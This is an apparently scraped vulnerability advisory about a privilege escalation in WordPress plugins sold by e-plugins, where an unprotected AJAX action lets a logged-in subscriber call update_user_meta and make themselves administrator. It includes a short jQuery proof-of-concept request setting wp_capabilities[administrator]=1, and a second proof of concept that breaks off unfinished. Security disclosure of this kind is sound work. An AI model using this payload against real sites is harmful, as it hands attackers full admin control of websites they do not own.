Lucene search

K
wpvulndbOmar BadranWPVDB-ID:D079CB16-EAD5-4BC8-B0B8-4A4DC2A54C96
HistoryMar 06, 2023 - 12:00 a.m.

Multiple e-plugins - Subscriber+ Privilege Escalation

2023-03-0600:00:00
Omar Badran
wpscan.com
21
e-plugins
developer
security measures
ajax calls
plugin.php
user registration
vulnerable

EPSS

0.001

Percentile

37.2%

The plugins, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.

PoC

directory-pro (set current logged in user to admin) jQuery.ajax({ url: “http://localhost/wp-admin/admin-ajax.php”, method: ‘post’, data: { action: “iv_directories_update_profile_setting”, form_data: wp_capabilities[administrator]=1 }, success: function(res){ console.log(res) } }); finaluser (edit user to set as admin):

EPSS

0.001

Percentile

37.2%

Related for WPVDB-ID:D079CB16-EAD5-4BC8-B0B8-4A4DC2A54C96